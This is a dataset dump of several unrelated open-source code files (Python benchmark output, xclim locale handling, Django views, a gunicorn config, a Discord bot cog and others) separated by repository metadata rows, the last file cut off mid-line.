# Main program: creates the worker threads and runs the algorithm
fil_exec_interface_utilisateur = threading.Thread(target=fonction_affichage)
heure_depart = time.time()
fil_exec_interface_utilisateur.start()
# Start the test loops
bench.demarre()
fil_exec_interface_utilisateur.join()
bench.arret()
pygame.quit()
if bench.total_compteur != 0:
total_tst = bench.total_compteur
total_vic = bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE]
total_ech = total_tst - total_vic
total_lvt = bench.compteur[bench_core.PARAMETRE_ECHEC_LEVIATHAN]
total_pit = bench.compteur[bench_core.PARAMETRE_ECHEC_PUIT]
total_nrj = bench.compteur[bench_core.PARAMETRE_ECHEC_ENERGIE]
total_exc = bench.compteur[bench_core.PARAMETRE_ECHEC_EXEPTION]
total_nrp = bench.compteur[bench_core.PARAMETRE_ECHEC_NON_REPONSE]
graine_lvt = bench.graines[bench_core.PARAMETRE_ECHEC_LEVIATHAN]
graine_pit = bench.graines[bench_core.PARAMETRE_ECHEC_PUIT]
graine_nrj = bench.graines[bench_core.PARAMETRE_ECHEC_ENERGIE]
graine_exc = bench.graines[bench_core.PARAMETRE_ECHEC_EXEPTION]
graine_nrp = bench.graines[bench_core.PARAMETRE_ECHEC_NON_REPONSE]
score = (1000 * (total_tst - 2 * total_nrp - total_exc // 2) - bench.trajet_moyen) * args.web_dim / bench.total_compteur
print(
"Statistiques finales:\n\tNombre total test: %d\n\n"
"Score final: %d\n"
"%d succès (%0.00f%%) avec un trajet moyen de %d\n"
"%d échecs (%0.00f%%) avec comme détails:\n"
"\t%d dues à un léviathan (%0.00f%%)%s\n"
"\t%d dues à un puit (%0.00f%%)%s\n"
"\t%d dues à un manque d'énergie (%0.00f%%)%s\n"
"\t%d dues à une exeption (%0.00f%%)%s\n"
"\t%d dues à un temps de réponse trop élevé (%0.00f%%)%s\n"
"" % (
total_tst,
score,
total_vic, 100 * total_vic / bench.total_compteur, bench.trajet_moyen,
total_ech, 100 * total_ech / bench.total_compteur,
total_lvt, 100 * total_lvt / bench.total_ech, afficher_graine(graine_lvt),
total_pit, 100 * total_pit / bench.total_ech, afficher_graine(graine_pit),
total_nrj, 100 * total_nrj / bench.total_ech, afficher_graine(graine_nrj),
total_exc, 100 * total_exc / bench.total_ech, afficher_graine(graine_exc),
total_nrp, 100 * total_nrp / bench.total_ech, afficher_graine(graine_nrp)
)
)
| 41.233796
| 242
| 0.662999
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,589
| 0.367485
|
b17694133578e1b1a9c1c195cbd91ca5e72b6295
| 181
|
py
|
Python
|
test/conftest.py
|
PlaidCloud/sqlalchemy-greenplum
|
b40beeee8b775290b262d3b9989e8faeba8b2d20
|
[
"BSD-3-Clause"
] | 6
|
2019-05-10T18:31:05.000Z
|
2021-09-08T16:59:46.000Z
|
test/conftest.py
|
PlaidCloud/sqlalchemy-greenplum
|
b40beeee8b775290b262d3b9989e8faeba8b2d20
|
[
"BSD-3-Clause"
] | 2
|
2018-06-04T23:28:16.000Z
|
2022-03-08T14:20:14.000Z
|
test/conftest.py
|
PlaidCloud/sqlalchemy-greenplum
|
b40beeee8b775290b262d3b9989e8faeba8b2d20
|
[
"BSD-3-Clause"
] | 1
|
2019-06-13T10:12:44.000Z
|
2019-06-13T10:12:44.000Z
|
from sqlalchemy.dialects import registry
registry.register("greenplum", "sqlalchemy_greenplum.dialect", "GreenplumDialect")
from sqlalchemy.testing.plugin.pytestplugin import *
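# With the dialect registered above, SQLAlchemy URLs of the form
# "greenplum://user:password@host/dbname" resolve to GreenplumDialect.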
| 22.625
| 82
| 0.823204
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 59
| 0.325967
|
b177b1d71b976403fe1dab8da5d47925b29da724
| 10,319
|
py
|
Python
|
xclim/core/locales.py
|
bzah/xclim
|
18ceee3f1db2d39355913c1c60ec32ddca6baccc
|
[
"Apache-2.0"
] | null | null | null |
xclim/core/locales.py
|
bzah/xclim
|
18ceee3f1db2d39355913c1c60ec32ddca6baccc
|
[
"Apache-2.0"
] | 2
|
2021-06-23T09:26:54.000Z
|
2021-07-26T19:28:41.000Z
|
xclim/core/locales.py
|
bzah/xclim
|
18ceee3f1db2d39355913c1c60ec32ddca6baccc
|
[
"Apache-2.0"
] | 1
|
2021-03-02T20:12:28.000Z
|
2021-03-02T20:12:28.000Z
|
# -*- coding: utf-8 -*-
# noqa: D205,D400
"""
Internationalization
====================
Defines methods and objects to help the internationalization of metadata for the
climate indicators computed by xclim.
All the methods and objects in this module use localization data given in json files.
These files are expected to be defined as in this example for french:
.. code-block::
{
"attrs_mapping" : {
"modifiers": ["", "f", "mpl", "fpl"],
"YS" : ["annuel", "annuelle", "annuels", "annuelles"],
"AS-*" : ["annuel", "annuelle", "annuels", "annuelles"],
... and so on for other frequent parameters translation...
},
"DTRVAR": {
"long_name": "Variabilité de l'amplitude de la température diurne",
"description": "Variabilité {freq:f} de l'amplitude de la température diurne (définie comme la moyenne de la variation journalière de l'amplitude de température sur une période donnée)",
"title": "Variation quotidienne absolue moyenne de l'amplitude de la température diurne",
"comment": "",
"abstract": "La valeur absolue de la moyenne de l'amplitude de la température diurne."
},
... and so on for other indicators...
}
Indicators are named by subclass identifier, the same as in the indicator registry (`xclim.core.indicators.registry`),
but which can differ from the callable name. In this case, the indicator is called through
`atmos.daily_temperature_range_variability`, but its identifier is `DTRVAR`.
Use the `ind.__class__.__name__` accessor to get its registry name.
Here, the usual parameter passed to the formatting of "description" is "freq" and is usually
translated from "YS" to "annual". However, in french and in this sentence, the feminine
form should be used, so the "f" modifier is added by the translator so that the
formatting function knows which translation to use. Acceptable entries for the mappings
are limited to what is already defined in `xclim.core.indicators.utils.default_formatter`.
For user-provided internationalization dictionaries, only the "attrs_mapping" and
its "modifiers" key are mandatory, all other entries (translations of frequent parameters
and all indicator entries) are optional. For xclim-provided translations (for now only french),
all indicators must have an entry and the "attrs_mapping" entries must match exactly the default formatter.
Those default translations are found in the `xclim/locales` folder.
Attributes
----------
TRANSLATABLE_ATTRS
List of attributes to consider translatable when generating locale dictionaries.
"""
import json
import warnings
from importlib.resources import contents, open_text
from pathlib import Path
from typing import Optional, Sequence, Tuple, Union
from .formatting import AttrFormatter, default_formatter
TRANSLATABLE_ATTRS = [
"long_name",
"description",
"comment",
"title",
"abstract",
"keywords",
]
def list_locales():
"""Return a list of available locales in xclim."""
locale_list = contents("xclim.data")
return [locale.split(".")[0] for locale in locale_list if locale.endswith(".json")]
def _valid_locales(locales):
return all(
[
(isinstance(locale, str) and get_best_locale(locale) is not None)
or (
not isinstance(locale, str)
and isinstance(locale[0], str)
and (Path(locale[1]).is_file() or isinstance(locale[1], dict))
)
for locale in locales
]
)
def get_best_locale(locale: str):
"""Get the best fitting available locale.
    For existing locales ['fr', 'fr-BE', 'en-US']:
    'fr-CA' returns 'fr', while 'en' and 'en-GB' both return 'en-US'.
Parameters
----------
locale : str
The requested locale, as an IETF language tag (lang or lang-territory)
Returns
-------
str or None:
        The best available locale. None if none are available.
"""
available = list_locales()
if locale in available:
return locale
locale = locale.split("-")[0]
if locale in available:
return locale
if locale in [av.split("-")[0] for av in available]:
return [av for av in available if av.split("-")[0] == locale][0]
return None
def get_local_dict(locale: Union[str, Sequence[str], Tuple[str, dict]]):
"""Return all translated metadata for a given locale.
Parameters
----------
locale : str or sequence of str
IETF language tag or a tuple of the language tag and a translation dict, or
a tuple of the language tag and a path to a json file defining translation
of attributes.
Raises
------
UnavailableLocaleError
If the given locale is not available.
Returns
-------
str
The best fitting locale string
dict
The available translations in this locale.
"""
if isinstance(locale, str):
locale = get_best_locale(locale)
if locale is None:
raise UnavailableLocaleError(locale)
return (
locale,
json.load(open_text("xclim.data", f"{locale}.json")),
)
if isinstance(locale[1], dict):
return locale
with open(locale[1], encoding="utf-8") as locf:
return locale[0], json.load(locf)
def get_local_attrs(
indicator: str,
*locales: Union[str, Sequence[str], Tuple[str, dict]],
names: Optional[Sequence[str]] = None,
append_locale_name: bool = True,
) -> dict:
"""Get all attributes of an indicator in the requested locales.
Parameters
----------
indicator : str
Indicator's class name, usually the same as in `xc.core.indicator.registry`.
*locales : str
IETF language tag or a tuple of the language tag and a translation dict, or
a tuple of the language tag and a path to a json file defining translation
of attributes.
names : Optional[Sequence[str]]
If given, only returns translations of attributes in this list.
append_locale_name : bool
If True (default), append the language tag (as "{attr_name}_{locale}") to the
returned attributes.
Raises
------
ValueError
If `append_locale_name` is False and multiple `locales` are requested.
Returns
-------
dict
All CF attributes available for given indicator and locales.
Warns and returns an empty dict if none were available.
"""
if not append_locale_name and len(locales) > 1:
raise ValueError(
"`append_locale_name` cannot be False if multiple locales are requested."
)
attrs = {}
for locale in locales:
loc_name, loc_dict = get_local_dict(locale)
loc_name = f"_{loc_name}" if append_locale_name else ""
local_attrs = loc_dict.get(indicator)
if local_attrs is None:
warnings.warn(
f"Attributes of indicator {indicator} in language {locale} were requested, but none were found."
)
else:
for name in TRANSLATABLE_ATTRS:
if (names is None or name in names) and name in local_attrs:
attrs[f"{name}{loc_name}"] = local_attrs[name]
return attrs
def get_local_formatter(
locale: Union[str, Sequence[str], Tuple[str, dict]]
) -> AttrFormatter:
"""Return an AttrFormatter instance for the given locale.
Parameters
----------
locale : str or tuple of str
IETF language tag or a tuple of the language tag and a translation dict, or
a tuple of the language tag and a path to a json file defining translation
of attributes.
"""
loc_name, loc_dict = get_local_dict(locale)
attrs_mapping = loc_dict["attrs_mapping"].copy()
mods = attrs_mapping.pop("modifiers")
return AttrFormatter(attrs_mapping, mods)
class UnavailableLocaleError(ValueError):
"""Error raised when a locale is requested but doesn't exist."""
def __init__(self, locale):
super().__init__(
f"Locale {locale} not available. Use `xclim.core.locales.list_locales()` to see available languages."
)
def generate_local_dict(locale: str, init_english: bool = False):
"""Generate a dictionary with keys for each indicators and translatable attributes.
Parameters
----------
locale : str
Locale in the IETF format
init_english : bool
If True, fills the initial dictionary with the english versions of the attributes.
Defaults to False.
"""
from xclim.core.indicator import registry
best_locale = get_best_locale(locale)
if best_locale is not None:
locname, attrs = get_local_dict(best_locale)
for ind_name in attrs.copy().keys():
if ind_name != "attrs_mapping" and ind_name not in registry:
attrs.pop(ind_name)
else:
attrs = {}
attrs_mapping = attrs.setdefault("attrs_mapping", {})
attrs_mapping.setdefault("modifiers", [""])
for key, value in default_formatter.mapping.items():
attrs_mapping.setdefault(key, [value[0]])
eng_attr = ""
for ind_name, indicator in registry.items():
ind_attrs = attrs.setdefault(ind_name, {})
for translatable_attr in set(TRANSLATABLE_ATTRS).difference(
set(indicator._cf_names)
):
if init_english:
eng_attr = getattr(indicator, translatable_attr)
if not isinstance(eng_attr, str):
eng_attr = ""
ind_attrs.setdefault(f"{translatable_attr}", eng_attr)
for var_attrs in indicator.cf_attrs:
# In the case of single output, put var attrs in main dict
if len(indicator.cf_attrs) > 1:
ind_attrs = attrs.setdefault(f"{ind_name}.{var_attrs['var_name']}", {})
for translatable_attr in set(TRANSLATABLE_ATTRS).intersection(
set(indicator._cf_names)
):
if init_english:
eng_attr = var_attrs.get(translatable_attr)
if not isinstance(eng_attr, str):
eng_attr = ""
ind_attrs.setdefault(f"{translatable_attr}", eng_attr)
return attrs
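# --- Hedged usage sketch (added; not part of the original module) ---
# Querying the translations shipped with xclim; "DTRVAR" is the indicator
# used as an example in the module docstring, assuming it exists in the
# installed french data.
if __name__ == "__main__":
    print(list_locales())  # e.g. ['fr'], depending on the packaged data
    print(get_local_attrs("DTRVAR", "fr", names=["long_name"]))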
| 35.582759
| 198
| 0.64609
| 293
| 0.028364
| 0
| 0
| 0
| 0
| 0
| 0
| 5,952
| 0.576186
|
b1784fe113bca2d558cd14a80d284029cd03a532
| 92
|
py
|
Python
|
tests/samples/importing/nested/base.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 23
|
2020-02-28T14:29:04.000Z
|
2021-12-23T20:50:54.000Z
|
tests/samples/importing/nested/base.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 172
|
2020-02-24T12:12:11.000Z
|
2022-03-29T03:08:24.000Z
|
tests/samples/importing/nested/base.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 1
|
2020-11-23T22:42:20.000Z
|
2020-11-23T22:42:20.000Z
|
from machinable import Component
class BaseComponent(Component):
"""Base component"""
| 15.333333
| 32
| 0.75
| 56
| 0.608696
| 0
| 0
| 0
| 0
| 0
| 0
| 20
| 0.217391
|
b17898d3cc02bf7ea9e57ca3010adf0a3b3916ab
| 435
|
py
|
Python
|
source/blockchain_backup/config/gunicorn.conf.py
|
denova-com/blockchain-backup
|
a445bcbd67bd6485a4969dc1e24d51fbffc43cff
|
[
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null |
source/blockchain_backup/config/gunicorn.conf.py
|
denova-com/blockchain-backup
|
a445bcbd67bd6485a4969dc1e24d51fbffc43cff
|
[
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null |
source/blockchain_backup/config/gunicorn.conf.py
|
denova-com/blockchain-backup
|
a445bcbd67bd6485a4969dc1e24d51fbffc43cff
|
[
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null |
# See https://docs.gunicorn.org/en/stable/configure.html
# The configuration file should be a valid Python source file with a python extension (e.g. gunicorn.conf.py).
bind='127.0.0.1:8962'
timeout=75
daemon=True
user='user'
accesslog='/var/local/log/user/blockchain_backup.gunicorn.access.log'
errorlog='/var/local/log/user/blockchain_backup.gunicorn.error.log'
loglevel='debug'  # note: the gunicorn setting is spelled "loglevel", not "log_level"
capture_output=True
max_requests=3
workers=1
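# A typical invocation using this file (the WSGI module path below is an
# assumption, not taken from the original source):
#   gunicorn -c source/blockchain_backup/config/gunicorn.conf.py blockchain_backup.wsgi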
| 29
| 113
| 0.777011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 319
| 0.733333
|
b1791920593f4e50adb1ee5900ad47f68783a7d1
| 211
|
py
|
Python
|
code_snippets/api-monitor-schedule-downtime.py
|
brettlangdon/documentation
|
87c23cb1d5e3e877bb37a19f7231b5d9239509dc
|
[
"BSD-3-Clause"
] | null | null | null |
code_snippets/api-monitor-schedule-downtime.py
|
brettlangdon/documentation
|
87c23cb1d5e3e877bb37a19f7231b5d9239509dc
|
[
"BSD-3-Clause"
] | null | null | null |
code_snippets/api-monitor-schedule-downtime.py
|
brettlangdon/documentation
|
87c23cb1d5e3e877bb37a19f7231b5d9239509dc
|
[
"BSD-3-Clause"
] | null | null | null |
import time

from datadog import initialize, api
options = {
'api_key': 'api_key',
'app_key': 'app_key'
}
initialize(**options)
# Schedule downtime
api.Downtime.create(scope='env:staging', start=int(time.time()))
| 17.583333
| 64
| 0.691943
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 68
| 0.322275
|
b17998122b0c9414fb547e0a5c5bf8d5f8b4473a
| 63
|
py
|
Python
|
src/oscar/apps/customer/__init__.py
|
QueoLda/django-oscar
|
8dd992d82e31d26c929b3caa0e08b57e9701d097
|
[
"BSD-3-Clause"
] | 4,639
|
2015-01-01T00:42:33.000Z
|
2022-03-29T18:32:12.000Z
|
src/oscar/apps/customer/__init__.py
|
QueoLda/django-oscar
|
8dd992d82e31d26c929b3caa0e08b57e9701d097
|
[
"BSD-3-Clause"
] | 2,215
|
2015-01-02T22:32:51.000Z
|
2022-03-29T12:16:23.000Z
|
src/oscar/apps/customer/__init__.py
|
QueoLda/django-oscar
|
8dd992d82e31d26c929b3caa0e08b57e9701d097
|
[
"BSD-3-Clause"
] | 2,187
|
2015-01-02T06:33:31.000Z
|
2022-03-31T15:32:36.000Z
|
default_app_config = 'oscar.apps.customer.apps.CustomerConfig'
| 31.5
| 62
| 0.84127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.650794
|
b179f01fa470edabbb25665461efb486ca6b1128
| 795
|
py
|
Python
|
modnotes/converters.py
|
jack1142/SinbadCogs-1
|
e0f24c0dbc3f845aa7a37ca96d00ee59494911ca
|
[
"BSD-Source-Code"
] | null | null | null |
modnotes/converters.py
|
jack1142/SinbadCogs-1
|
e0f24c0dbc3f845aa7a37ca96d00ee59494911ca
|
[
"BSD-Source-Code"
] | null | null | null |
modnotes/converters.py
|
jack1142/SinbadCogs-1
|
e0f24c0dbc3f845aa7a37ca96d00ee59494911ca
|
[
"BSD-Source-Code"
] | null | null | null |
import contextlib
import re
from typing import NamedTuple, Optional
import discord
from redbot.core.commands import BadArgument, Context, MemberConverter
_discord_member_converter_instance = MemberConverter()
_id_regex = re.compile(r"([0-9]{15,21})$")
_mention_regex = re.compile(r"<@!?([0-9]{15,21})>$")
class MemberOrID(NamedTuple):
member: Optional[discord.Member]
id: int
@classmethod
async def convert(cls, ctx: Context, argument: str):
with contextlib.suppress(Exception):
m = await _discord_member_converter_instance.convert(ctx, argument)
return cls(m, m.id)
match = _id_regex.match(argument) or _mention_regex.match(argument)
if match:
return cls(None, int(match.group(1)))
raise BadArgument()
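# Hedged usage note (added): annotating a command parameter with this class,
# e.g. `async def note(self, ctx, who: MemberOrID):`, makes discord.py call
# MemberOrID.convert() to parse the argument into a (member, id) pair.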
| 27.413793
| 79
| 0.693082
| 485
| 0.610063
| 0
| 0
| 401
| 0.504403
| 384
| 0.483019
| 41
| 0.051572
|
b179ff426e1a26e74d3b6cc6592435b4bf9294c3
| 224
|
py
|
Python
|
face_api/admin.py
|
glen-s-abraham/face-detection-api
|
ce671a9750065c0fc82d0dd668299738f1c07508
|
[
"MIT"
] | null | null | null |
face_api/admin.py
|
glen-s-abraham/face-detection-api
|
ce671a9750065c0fc82d0dd668299738f1c07508
|
[
"MIT"
] | null | null | null |
face_api/admin.py
|
glen-s-abraham/face-detection-api
|
ce671a9750065c0fc82d0dd668299738f1c07508
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from face_api.models import KnowledgeDatabase
from face_api.models import ImageUploads
# Register your models here.
admin.site.register(KnowledgeDatabase)
admin.site.register(ImageUploads)
| 24.888889
| 45
| 0.848214
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.125
|
b17a29c0eb42919a5d5dc662a31db12c22531561
| 4,596
|
py
|
Python
|
plugins/base/views.py
|
adlerosn/corpusslayer
|
d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58
|
[
"MIT"
] | null | null | null |
plugins/base/views.py
|
adlerosn/corpusslayer
|
d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58
|
[
"MIT"
] | 1
|
2019-07-06T20:43:45.000Z
|
2019-07-06T20:43:45.000Z
|
plugins/base/views.py
|
adlerosn/corpusslayer
|
d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2017 Adler Neves <adlerosn@gmail.com>
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os

pluginName = os.path.abspath(__file__).split(os.path.sep)[-2]
importline1 = 'import '+('.'.join(['plugins', pluginName, 'models'])+' as models')
importline2 = 'import '+('.'.join(['plugins', pluginName, 'forms'])+' as forms')
exec(importline1)  # import plugins.thisplugin.models as models
exec(importline2)  # import plugins.thisplugin.forms as forms

import application.forms as app_forms
import application.models as app_models
import application.business as app_ctrl

from django.utils.translation import ugettext_lazy as _
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views.generic import View
from django.views.generic import TemplateView
from django.template.response import TemplateResponse
from django.http import Http404
from django.urls import reverse
from django.core.paginator import Paginator
from urllib.parse import urlencode

from view.pages.views import SoonView, TemplateViewLoggedIn, UserPartEditFormView
from view.pages.views import CrudDeleteView, CrudEditView, CrudListView

import re
import json
import base64


def escapeRegex(s):
    o = ''
    for c in s:
        if c in ',.+*?|^$[]{}()\\':
            o += '\\'
        o += c
    return o


def findFirstStringAtZero(el):
    if isinstance(el, str):
        return el
    else:
        return findFirstStringAtZero(el[0])


class MockRegexSeachWithIn:
    def __init__(self, data):
        self.data = data

    def search(self, bigger):
        if bigger.__contains__(self.data):
            return True
        return None


# Create your views here.
class DocumentView(TemplateViewLoggedIn):
    template_name = 'plugins/base/document.html'

    def get(self, request, corpus_pk='0', doc_pk='0'):
        bl = app_ctrl.Business(request)
        document = app_models.Document.objects.get(user__id=bl.user.id, corpus__pk=corpus_pk, pk=doc_pk)
        corpus = document.corpus
        return render(request, self.template_name, {
            'corpus': corpus,
            'document': document,
            'textlines': document.text.strip().splitlines(),
        })


class FinderView(TemplateViewLoggedIn):
    template_name = 'plugins/base/finder.html'

    def get(self, request, corpus_pk='0', fragment=''):
        bl = app_ctrl.Business(request)
        corpus = app_models.Corpus.objects.get(user__id=bl.user.id, pk=corpus_pk)
        documents = corpus.documents.all()
        wanted = json.loads(base64.b64decode(fragment).decode('utf-8'))
        searched = None
        if isinstance(wanted, str):
            searched = escapeRegex(wanted.strip())
            searched = searched.replace(' ', '\\s*')
            wanted = re.compile(searched)
        else:
            searched = '\\s*'.join(map(escapeRegex, map(findFirstStringAtZero, wanted)))
            wanted = re.compile(searched)
        matchedDocs = list()
        for document in documents:
            if wanted.search(document.text) is not None:
                matchedDocs.append(document)
        matchedDocs.sort(key=lambda a: a.title)
        if len(matchedDocs) <= 0:
            raise Http404("Couldn't find any document with: " + searched)
        if len(matchedDocs) == 1:
            return HttpResponseRedirect(reverse('base_document', None, [corpus_pk, matchedDocs[0].pk]))
        return render(request, self.template_name, {
            'query': searched,
            'corpus': corpus,
            'documents': matchedDocs,
        })
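# --- Editor's sketch (hedged): the fragment format FinderView decodes ---
# Inferred only from the json.loads(base64.b64decode(...)) call above; the
# URL route shown is hypothetical.
#
# import base64, json
# fragment = base64.b64encode(json.dumps("hello world").encode("utf-8")).decode("ascii")
# # A request routing <corpus_pk>/<fragment> to FinderView would then match
# # documents whose text contains "hello world" (whitespace-insensitively,
# # per the \s* rewrite above).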
| 38.3
| 104
| 0.698216
| 2,050
| 0.44604
| 0
| 0
| 0
| 0
| 0
| 0
| 1,512
| 0.328982
|
b17abbe2c8f968394190d9316ec3a085ca24ece7
| 197
|
py
|
Python
|
addons/stats/scripts/predictors/abstract_predictor.py
|
Kait-tt/tacowassa
|
7e71c6ef6b5f939a99a3600025b26d459ebc0233
|
[
"MIT"
] | null | null | null |
addons/stats/scripts/predictors/abstract_predictor.py
|
Kait-tt/tacowassa
|
7e71c6ef6b5f939a99a3600025b26d459ebc0233
|
[
"MIT"
] | 141
|
2016-08-23T03:44:17.000Z
|
2017-10-08T02:39:36.000Z
|
addons/stats/scripts/predictors/abstract_predictor.py
|
Kait-tt/tacowassa
|
7e71c6ef6b5f939a99a3600025b26d459ebc0233
|
[
"MIT"
] | 1
|
2019-04-05T15:19:43.000Z
|
2019-04-05T15:19:43.000Z
|
# coding:utf-8
from abc import ABCMeta, abstractmethod
class AbstractPredictor(metaclass=ABCMeta):
@classmethod
@abstractmethod
def predicate(cls, tasks, user_id, cost):
pass
| 19.7
| 45
| 0.720812
| 139
| 0.705584
| 0
| 0
| 91
| 0.461929
| 0
| 0
| 14
| 0.071066
|
b17ac66814a8b6950eb9f7e8278e334fa9498901
| 216
|
py
|
Python
|
day11/eqatri.py
|
nikhilsamninan/python-files
|
15198459081097058a939b40b5e8ef754e578fe0
|
[
"Apache-2.0"
] | null | null | null |
day11/eqatri.py
|
nikhilsamninan/python-files
|
15198459081097058a939b40b5e8ef754e578fe0
|
[
"Apache-2.0"
] | null | null | null |
day11/eqatri.py
|
nikhilsamninan/python-files
|
15198459081097058a939b40b5e8ef754e578fe0
|
[
"Apache-2.0"
] | null | null | null |
size = 5
m = (2 * size) - 2
for i in range(0, size):
    for j in range(0, m):
        print(end=" ")
    m = m - 1
    for j in range(0, i + 1):
        if (m % 2 != 0):
            print("*", end=" ")
    print("")
| 12.705882
| 31
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.050926
|
b17bb1524daf129418a0726643402df5cb23be6d
| 691
|
py
|
Python
|
tests/test_constants.py
|
9cat/dydx-v3-python
|
c222f3d0b1a870e63fcceaf19b42109c9558a6df
|
[
"Apache-2.0"
] | null | null | null |
tests/test_constants.py
|
9cat/dydx-v3-python
|
c222f3d0b1a870e63fcceaf19b42109c9558a6df
|
[
"Apache-2.0"
] | null | null | null |
tests/test_constants.py
|
9cat/dydx-v3-python
|
c222f3d0b1a870e63fcceaf19b42109c9558a6df
|
[
"Apache-2.0"
] | null | null | null |
from dydx3.constants import SYNTHETIC_ASSET_MAP, SYNTHETIC_ASSET_ID_MAP, ASSET_RESOLUTION, COLLATERAL_ASSET


class TestConstants():

    def test_constants_have_regular_structure(self):
        for market, asset in SYNTHETIC_ASSET_MAP.items():
            market_parts = market.split('-')
            base_token, quote_token = market_parts
            assert base_token == asset
            assert quote_token == 'USD'
            assert len(market_parts) == 2
        assert list(SYNTHETIC_ASSET_MAP.values()) == list(SYNTHETIC_ASSET_ID_MAP.keys())
        assets = [x for x in ASSET_RESOLUTION.keys() if x != COLLATERAL_ASSET]
        assert assets == list(SYNTHETIC_ASSET_MAP.values())
| 40.647059
| 107
| 0.688857
| 580
| 0.839363
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.011577
|
b17beb716bfd95140964574b9d48ea04c12d770d
| 5,802
|
py
|
Python
|
src/cogs/invasion.py
|
calsf/codex-prime
|
c651d4c2f34581babc8078d01fe84dc95f3b7c36
|
[
"MIT"
] | null | null | null |
src/cogs/invasion.py
|
calsf/codex-prime
|
c651d4c2f34581babc8078d01fe84dc95f3b7c36
|
[
"MIT"
] | null | null | null |
src/cogs/invasion.py
|
calsf/codex-prime
|
c651d4c2f34581babc8078d01fe84dc95f3b7c36
|
[
"MIT"
] | null | null | null |
# INVASION COMMANDS:
# !invasions // !atinvasions <reward> // !rminvasions
import discord
from discord.ext import commands
import asyncio
from src import sess


class Invasions(commands.Cog):
    def __init__(self, bot):
        self.bot = bot
        self.alert_dict = {}  # user: reward, list of prev invasions with reward

    @commands.Cog.listener()
    async def on_ready(self):
        print('Invasions Online')
        # Periodically check
        while True:
            await asyncio.gather(self.check_invasions(50))

    @commands.command()
    async def invasions(self, ctx):
        inv = await sess.request('invasions')
        if inv == 0:
            print("Could not retrieve data.")
            return
        embed = discord.Embed(title="Invasions")
        # Organize invasions into description/type
        inv_dict = {}  # example: {GrineerOffensive: [{mission}, {mission}], }
        for i in inv:
            if not i['completed']:  # Do not add invasions that have been completed
                if i['desc'] in inv_dict:
                    inv_dict[i['desc']].append(i)
                else:
                    inv_dict[i['desc']] = []
                    inv_dict[i['desc']].append(i)
        # Show invasion information grouped via description/type
        for key, li in inv_dict.items():
            info = ''
            for v in li:
                node = v['node']
                atk_reward = v['attackerReward']['asString'] or 'N/A'
                def_reward = v['defenderReward']['asString'] or 'N/A'
                attackers = v['attackingFaction']
                defenders = v['defendingFaction']
                info += node + ': \n' + attackers + f' [{atk_reward}]' + ' vs ' + defenders + f' [{def_reward}]\n'
            embed.add_field(name=f'{key}', value=f'{info}', inline=False)
        await ctx.send(embed=embed)

    # Add user of command to the alert_dict to be alerted of invasions with specific reward
    @commands.command()
    async def atinvasions(self, ctx, *, reward=''):
        try:
            if not reward:
                await ctx.send(ctx.message.author.mention + ' Enter an invasion reward to be alerted for.')
            else:
                self.alert_dict[ctx.message.author] = [reward, []]
                await ctx.message.author.send(
                    f' You will now be alerted for invasions with a {reward.title()} reward.'
                    ' To stop being alerted, use command "!rminvasions"')
        except ValueError:
            await ctx.message.author.send('Enter an invasion reward to be alerted for.')

    # Remove user of command from the alert_dict to no longer be notified of invasion rewards
    @commands.command()
    async def rminvasions(self, ctx):
        try:
            self.alert_dict.pop(ctx.message.author)
            await ctx.message.author.send('You are no longer being alerted for invasions.')
        except KeyError:
            await ctx.message.author.send('You are currently not being alerted.')

    # THIS WILL BE PERIODICALLY CALLED on_ready
    # Check for invasions with specific rewards for each user
    async def check_invasions(self, delay):
        # Wait before making request
        await asyncio.sleep(delay)
        inv = await sess.request('invasions')
        if inv == 0:
            print("Could not retrieve data.")
            return
        embed = discord.Embed(title="Invasions")
        # Organize invasions into description/type
        inv_dict = {}  # example: {GrineerOffensive: [{mission}, {mission}], }
        for i in inv:
            if not i['completed']:  # Do not add invasions that have been completed
                if i['desc'] in inv_dict:
                    inv_dict[i['desc']].append(i)
                else:
                    inv_dict[i['desc']] = []
                    inv_dict[i['desc']].append(i)
        # Check each user's tracked reward and notify of any missions with their specific reward
        for user in self.alert_dict.keys():
            embed.clear_fields()
            user_inv = []
            for key, li in inv_dict.items():
                info = ''
                for v in li:
                    if self.alert_dict[user][0].lower() in v['attackerReward']['asString'].lower() \
